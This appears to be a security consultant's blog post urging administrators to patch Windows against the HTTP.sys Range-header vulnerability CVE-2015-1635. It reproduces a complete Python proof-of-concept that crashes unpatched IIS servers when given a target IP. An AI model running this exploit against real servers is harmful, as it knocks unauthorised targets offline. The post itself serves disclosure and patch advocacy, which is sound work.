Keep your Windows servers patched

Unlike Heartbleed and Shellshock, this vulnerability hasn’t gotten much attention.
And so far it “only” results in a denial of service by crashing unpatched servers.

The new vulnerability found (and patched) in HTTP.sys in Windows is super simple to exploit to crash a server. It affects Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1 and Windows Server 2012 Gold/R2. And it has the potential to be used to execute arbitrary code on the target server. Although no such Proof-Of-Concept has been released in public yet, who knows what’s going on in the not so public parts of the Internet?

There are however a few PoC examples released already, and one of them can be used without any modification to crash a vulnerable server.

https://www.exploit-db.com/exploits/36776/

#Tested on Win Srv 2012R2.
import socket,sys
 
if len(sys.argv)<=1:
 sys.exit('Give me an IP')
Host = sys.argv[1]
def SendPayload(Payload, Host):
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((Host, 80))
   s.send(Payload)
   s.recv(1024)
   s.close()
#Make sure iisstart.htm exist.
Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n"
Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n"
SendPayload(Init, Host)
SendPayload(Payload, Host)

Upon testing the code above on a few of my test servers, they crashed immediately.
During some of the tests the servers didn’t even have time to save a crash dump.

 

Patch your servers!

References
https://www.exploit-db.com/exploits/36776/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635

I'm a Security consultant at TrueSec. I mostly deal with penetration testing and code reviews, but I also like to allocate time for different kinds of security research. Twitter - https://twitter.com/alcorsecurity

Tagged with: , , , ,
Posted in Hacking

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Categories
%d bloggers like this: